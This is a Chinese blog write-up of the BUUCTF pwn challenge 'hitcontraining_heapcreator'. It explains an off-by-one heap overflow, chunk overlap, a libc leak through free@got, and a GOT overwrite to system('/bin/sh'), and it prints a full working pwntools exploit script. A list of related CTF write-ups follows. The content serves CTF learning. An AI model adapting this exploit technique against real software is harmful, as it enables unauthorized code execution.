hitcontraining_heapcreator

最新推荐文章于 2024-06-27 10:48:41 发布
最新推荐文章于 2024-06-27 10:48:41 发布
阅读量2.8k 收藏 1
点赞数
分类专栏: BUU-PWN 文章标签: pwn wp 网络安全 信息安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0sway/article/details/122358972
版权

hitcontraining_heapcreator

使用checksec查看:
在这里插入图片描述
开启了Canary和栈不可执行,没有开启PIE。

先运行一下看看:
在这里插入图片描述
看到菜单,堆题,放进IDA中查看:
在这里插入图片描述
分布来查看,首先是create_heap()
在这里插入图片描述

  • heaparray[i] = malloc(0x10uLL):创建用户所需chunk前程序会先创建一个0x10大小的chunk
  • v0[1] = malloc(size);:程序所创建的chunk中存放了用户所创的chunk的地址

edit_heap()
在这里插入图片描述

  • read_input(*((_QWORD *)heaparray[v1] + 1), *(_QWORD *)heaparray[v1] + 1LL);:末尾多加了1 ,明显的off-by-one漏洞

show()
在这里插入图片描述

  • 没啥问题,就显示出内容

delete_heap()
在这里插入图片描述

  • heaparray[v1] = 0LL;指针清了,也没啥问题。

题目思路

  • 全局看下来只存在了一个off-by-one漏洞。
  • 利用 off by one 漏洞覆盖下一个 chunk 的 size 字段。
  • 从而构造fake_chunk 大小。
  • 申请fake_chunk 大小
  • 产生 chunk overlap,进而修改关键指针。

步骤解析

程序自动创建的chunk大小是0x10,所以本题我们也使用这个大小。
首先创建三个chunk

在这里插入图片描述
在这里插入图片描述

通过off-by-one修改chunk0,覆盖到程序创建的chunk1的size位

在这里插入图片描述

接着free掉chunk1

在这里插入图片描述

可以看到free掉的chunk进入了fastbin中的0x80位置,此时在申请一个0x70大小的chunk,就能将这个0x80块申请出来

此时chunk2的指针没有更改,系统创建的chunk2还是存放着用户创建的chunk2的地址

我们可以将该地址修改成free@got的地址,泄露出libc的地址。

在这里插入图片描述
在这里插入图片描述

接着修改chunk2,对应得就会修改free@got所指向的地址,将该地址修改成system的地址

调用free时,就会调用system,前面已经将chunk0的内容改为/bin/sh

所以free(0)就会变成system('/bin/sh')

完整exp:

from pwn import *

#start
# r = remote('node4.buuoj.cn',29754)
r = process("../buu/hitcontraining_heapcreator")
elf = ELF("../buu/hitcontraining_heapcreator")
libc = ELF("../buu/ubuntu16(64).so")
context.log_level='debug'
gdb.attach(r,"b *0x4008FA")

def add(size,content):
    r.sendlineafter("choice :",'1')
    r.sendlineafter("Heap : ",str(size))
    r.sendlineafter("heap:",content)

def edit(idx,content):
    r.sendlineafter("choice :",'2')
    r.sendlineafter("Index :",str(idx))
    r.sendlineafter("heap : ",content)

def show(idx):
    r.sendlineafter("choice :",'3')
    r.sendlineafter("Index :",str(idx))

def delete(idx):
    r.sendlineafter("choice :",'4')
    r.sendlineafter("Index :",str(idx))

#params
free_got = elf.got['free']

#attack
add(0x18,"MMMM")
add(0x10,"MMMM")
add(0x10,"MMMM")
# gdb.attach(r)

edit(0,b'/bin/sh\x00'+p64(0)*2+b'\x81')
# gdb.attach(r)
delete(1)

add(0x70,p64(0)*8+p64(0x8)+p64(free_got))
show(2)
free_addr = u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))

#libc
base_addr = free_addr - libc.symbols['free']
system_addr = base_addr + libc.symbols['system']

edit(2,p64(system_addr))
#gdb.attach(r)
delete(0)

r.interactive()
m0sway
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hitcontraining_playfmt 解题思路
Morphy_Amo的博客
03-19 735
格式化字符串
BUUCTF hitcontraining_magicheap[堆]
weixin_45441024的博客
12-28 391
BUUCTF hitcontraining_magicheap[堆](Unsorted bin attack) 我们先来学习一下什么是Unsorted binattack 用ctfwiki里面的例子来进行解释: Unsorted Bin Attack,顾名思义,该攻击与 Glibc 堆管理中的的 Unsorted Bin 的机制紧密相关。 Unsorted Bin Attack 被利用的前提是控制 Unsorted Bin Chunk 的 bk 指针。 Unsorted Bin Attack 可以达到的效
C语言栈溢出 重定向返回地址 执行shellcode学习
顺炸天
12-31 602
REF: https://www.youtube.com/watch?v=1S0aBV-Waeo- 栈结构 https://dl.packetstormsecurity.net/papers/attack/64bit-overflow.pdf- 64位linux 动手实现buffer overflow http://www.cppblog.com/baby-fly/archive/2010/07/27/121395.html- gdb debug 实验环境 Linux kali(201...
hitcontraining_magicheap--(基础堆)
最新发布
2301_80168334的博客
06-27 768
接下来又是对v3进行判断,如果v3>3,接着判断v3是否等于4,如果等于4就exit(0)退出。可以知道这里首先是输入index,并且读取到的数值赋值给了v1,v1还要进行判断,且与create_heap函数中的chunk是有关系的。=2则是会输出"Invalid Choice",else则是进入到edit_heap函数中。,因为malloc () 函数。接下来还是对v3进行判断,如果v3==1则进入到create_heap()函数中。分析完大概得意思了,就进行一个函数一个函数的查看,寻找解题的关键点。
buuctf hitcontraining_heapcreator HITCON Trainging lab13
weixin_45677731的博客
08-10 1058
这一题在wiki上面是有的,在Chunk Extend and Overlapping里面,个人觉得这一题对于我这种刚开始学习堆的人来说,是比较容易理解的一题 拖进IDA create_heap函数: 值得注意的是,他这里是会有两次malloc的,也就是说,你申请了一次,他就会创建两个chunk,第一个chunk是0x20大小的,可以看作是记录的作用,里面存放着第二个chunk的size和指针,同时,第一个chunk的地址指针保存在bss段中,heaparray数组这里: 这样表述起来可能不太清晰,我申
BUUCTF--hitcontraining_heapcreator1
qq_30528603的博客
01-05 441
此时往chunk3这个用户堆写数据,将会写入free_got表里,这样我们可以将伪造的system的地址写入free_got表,一旦调用free,将会去执行system。2.接着修改chunk0的内容填入bin/sh作为后续system的参数,利用off-by-one并修改下一个索引chunk的大小为0x81(覆盖的是chunk1的索引堆)。这句其实可以这样解读read(0,对应索引堆里的那个堆地址,Size),现在他将变成这样read(0,&free_got,Size)。以此来达到我们的目的。
[off by one] hitcontraining_heapcreator
huzai9527的博客
04-01 392
[off by one] hitcontraining_heapcreator 本题主要看懂,edit中的off by one, 知道off by one 还需要知道程序的大概结构体 从内存情况推测结构体 每次申请空间,会创建2个chunk,其中一个固定为下面结构体形式,另一个根据大小分配 struct test{ int size; char *content; } exp from pwn import * #p = remote('node3.buuoj.cn',27554) p
【CTF】【PWN】【UAF】【萌新友好向wphitcontraining_uaf
m0_50819561的博客
10-08 391
这题的反编译有点阴间。 这是add函数,add一次会malloc两个chunk。 同时要注意,这里的notelist是一个二维数组。notelist[i]表示的其实是notelist[i][0].后面还有一个notelist[i][1]。 我们看notelist[i],他被赋值为print_note_content这个地址的函数。 notelist[i][1]才是真正存放chunk的content的地方。 为什么要把notelist[i]赋值为print_note_content这个地址的函数呢? 下面这
BUUCTF hitcontraining_uaf
BengDouLove的博客
04-09 937
这是我第一次自己做出来的堆题,,????动 没什么特别,,看一看代码 还是一个堆块管理系统,不过这次他管理的时候有些不一样 1.add 不一样就在这里,,如果要创建一个用户数据,,先malloc一个八字节的指针堆块(我这么叫。。里面放着指针),,这八字节,前四个字节是一个pirnt_note_content函数,,这个函数的作用是以他后面相邻四个字节的数据为指针,打印这个指针里面的内容;;;申请...
BUUCTF-PWN刷题记录-3
weixin_44145820的博客
03-31 913
目录hitcontraining_heapcreator hitcontraining_heapcreator 考虑修改GOT表 在edit函数中可以溢出一个byte 这题需要利用堆重叠的方法,因为free之后会置空,只能利用堆重叠进行重复分配 利用思路如下: 先申请三个heap,其中heap[0]的内容大小为8的奇数倍 使用edit溢出修改heap[1]的chunk的size,把heap[...
HITCON-Training lab13 heapcreatorheap extend)
像初雪一样自由洒落
04-16 1044
啊啊啊,搞了一早上,终于终于搞明白了,,, 题目链接:https://buuoj.cn/challenges#hitcontraining_heapcreator ida简单看一下 创建堆 编辑 对比建堆,可以看到size大了一个 打印 删除 程序基本功能就这样了 因为edit的时候可以多写入一个字节,存在off-by-one,我们可...
hitcontraining_heapcreator 3/100
m0_57754423的博客
02-23 114
漏洞点: edit_chunk :off by one 一个字节的溢出 free_chunk: 逻辑漏洞,可以泄露libc 思路: 利用逻辑漏洞泄露libc 利用off by one 实现chunk extend 构造堆块重叠 实现任意地址写 exp: from pwn import * p = process("./heapcreator") e = ELF("./heapcreator") libc = e.libc p.timeout = 0.1 def add(size,content): p.r
HITCON Trainging lab13——heapcreator
04-19 254
64位程序,没开PIE   #chunkoverlapping #off by one 程序逻辑 1 int __cdecl main(int argc, const char **argv, const char **envp) 2 { 3 char *v3; // rsi 4 const char *v4; // rdi 5 char...
[BUUCTF]-PWN:hitcontraining_heapcreator解析(off by one)
2301_79326813的博客
01-17 632
又是一道堆题,先看一下保护Partial RELRO说明got表可被修改,而且还没开pie,直接看ida这里就不过多解释了,把比较重要的说一下。首先是这个edit,它限制了填充字节,只能比我们申请的大小多1个字节。还有创建堆块的函数,他在创建我们申请的堆块前还申请了一个大小为0x10的堆块。在动态调试中可以发现,这个堆块还存储了与填充字节数有关的字节数,而且还和heaparray一样存储了指向与他一同创建的堆块的指针。
HITCON Trainging lab13 heapcreator
snowleopard_bin的博客
10-03 1068
记录第一次不看任何writeup自己写出来的pwn题 前置知识: off by one chunk overlapping chunk extend 一开始先看程序打开哪些保护机制 可以改got表,并且有点要注意是没开PIE,这样就不必泄露函数地址计算基址了(如果开了,这题堆上没有存放函数指针的,我也不会泄露。。) 然后分析程序,挖漏洞 首先从建堆函数看数据结构 结构...
hitcontraining magicheap
pondzhang的专栏
06-16 358
from pwn import * magic = 0x00000000006020A0 #p = process('./magicheap') p = remote("node3.buuoj.cn",26020) def CreateHeap(size,content): p.sendlineafter('Your choice :','1') p.sendlineafter('Size of Heap : ',str(size)) p.sendlineafter('Content of heap:
hitcontraining_magicheap
m0sway的博客
12-21 333
hitcontraining_magicheap 使用checksec查看: 一道堆题,关闭了PIE,可以考虑覆盖got表来获取system getshell 拉进IDA中查看: 标准的菜单,main()函数就不贴截图了,menu()函数也没有营养,图也不贴了, 先来看看create_heap(): heaparray[i]:存放 chunk 的地址。 read_input(heaparray[i], size):向 chunk 写入 size 大小的内容。 heaparray是存放在bss段上的
buu cipher
10-23
Buu Cipher 是一种对称加密算法,也被称为布式密码。它是一种较为简单的加密算法,基于置换和替代的原理进行加密和解密。Buu Cipher 的加密过程可以简单地分为两个步骤:混淆和扩散。 首先,混淆步骤使用一个密钥和置换表对明文进行置换。置换表是由密钥生成的,用于打乱明文中字符的顺序。这样,原本明文中相邻的字符将被分散到密文中的不同位置,增加了密文的复杂性。 其次,扩散步骤通过将每个字符替换为另一个字符来进一步混淆数据。此替换过程可以由算法中的扩散函数完成,该函数使用密钥和置换表来生成相应的替代字符。这样,明文中的每个字符都将被替换为不同的字符。 解密过程与加密过程相反。先使用相同的密钥和置换表进行扩散的逆向操作,将密文中的每个字符恢复为替代字符。然后使用相同的密钥和置换表进行混淆的逆向操作,恢复密文中字符的顺序,即可得到原始的明文。 尽管 Buu Cipher 是一种较为简单的加密算法,但它仍可以提供基本的保密性,以防止未授权者对加密数据的解读。然而,它的加密强度相对较低,可能容易受到密码分析方法的攻击。因此,在实际应用中,我们可能需要结合其他更为复杂和安全的加密算法来提高数据的保密性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值